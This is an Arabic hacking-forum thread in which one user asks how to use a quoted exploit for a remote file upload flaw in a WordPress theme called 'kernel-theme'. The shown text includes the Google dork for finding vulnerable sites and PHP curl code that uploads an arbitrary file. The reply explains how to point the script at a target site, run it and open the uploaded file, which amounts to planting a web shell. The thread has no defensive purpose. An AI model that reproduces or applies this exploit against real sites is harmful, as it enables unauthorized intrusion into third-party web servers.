اين هو الاستغلال وكيفية الاسغلال

اين هو الاستغلال وكيفية الاسغلال


النتائج 1 إلى 2 من 2

الموضوع: اين هو الاستغلال وكيفية الاسغلال

العرض المتطور

المشاركة السابقة المشاركة السابقة   المشاركة التالية المشاركة التالية
  1. #1

    Come اين هو الاستغلال وكيفية الاسغلال

    السلام عليكم كيفكم يا اعضاء ارجوا منكم حل لمشكلتي لم اعرف اين هو الدورك وكيفية الاسغلال هذه الثغرة الخاصة ب الورد بيس
    #############
    # Exploit Title: WordPress themekernel-theme Themes Remote File Upload Vulnerability
    # Author: iskorpitx
    # Date: 6/11/2013
    # Vendor Homepage: http://www.wikmag.com/
    # Themes Link: http://themeforest.net/item/kernel-p...-theme-/857077
    # Infected File: upload-handler.php
    # Category: webapps
    # Google dork: inurl:/wp-content/themes/kernel-theme/
    # Tested on : Windows/Linux
    ################################################## #################################################

    # Exploit


    <?php
    $uploadfile="upload.php";
    $ch = curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch); print "$postResult";
    ?>

    http://127.0.0.1/wordpress/wp-conten.../11/upload.php




    All http://www.mavi1.org members

    - - - تم التحديث - - -

    وين الاستغلال ي ااخوان وكيفية استغلال
    من خبرتي .......

    1-لا اختراق أبدا قبل الحماية
    2-ان لم تتعلم التشفير فأنت لست هكر
    3-لا اختراق بامتداد صورة الا بثغرة نظام
    4-ضروري تعلم اكتشاف واستغلال الثغرات
    5-لابد من وجود شيئ برايفت لك
    6-يستحيل أن تعرف كل شيئ في الاختراق
    7-يستحيل أن تدخل الهكر ولا يخترق جهازك
    8-يستحيل أن تنام من غير ما تفكر في الهكر
    9-يستحيل أن يطرح سيرفر و يظل مشفر أكثر من 24 ساعة
    10-يستحيل أن نرى عالم الهكرمن دون ملغمين
    GOSTE DZ

  2. #2

    افتراضي رد: اين هو الاستغلال وكيفية الاسغلال

    وعليكم السلام ورحمة الله وبركاته ,

    الدورك
    inurl:/wp-content/themes/kernel-theme

    الاستغلال يتم عمل ملف جديد وداخله "

    <?php
    $uploadfile="upload.php";
    $ch = curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch); print "$postResult";
    ?>
    ويتم تعديل http://127.0.0.1/wp-content/themes/k...ad-handler.php

    فقط تغيير http://127.0.0.1 إلى رابط الموقع المستهدف اذا كان باسم مجلد اخر يضاف معاه مثال اسم المجلد site بيكون
    http://127.0.0.1/site

    حفظه بصيغة php بالاسم الذي تريده .
    ورفعه على السيرفر الشخصي او موقع اخر ..

    واستعراضه .

    بتوفيق لك !

المواضيع المتشابهه

  1. سكريبت فحص ثغرات jce + اداة الاستغلال ^_*
    بواسطة touita في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 9
    آخر مشاركة: 11-06-2013, 05:07 PM
  2. الاستغلال
    بواسطة mjnon97 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 2
    آخر مشاركة: 07-31-2013, 06:27 PM
  3. ثغرة vlc من نوع buffer overflow شرح الاستغلال فيديو
    بواسطة touita في المنتدى قسم الثغرات
    مشاركات: 10
    آخر مشاركة: 03-26-2013, 11:59 PM
  4. ثلاث مواقع مصابة بثغرة Admin bypass بسيطة الاستغلال
    بواسطة HaCKer011 في المنتدى قسم الثغرات
    مشاركات: 3
    آخر مشاركة: 05-11-2012, 05:34 PM
  5. جميع دوركات..SQL injection + شرح طريقة الاستغلال واختراق الموقع (الشرح بالصور) ...
    بواسطة QtRoNiX FoX في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 14
    آخر مشاركة: 01-24-2012, 02:45 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •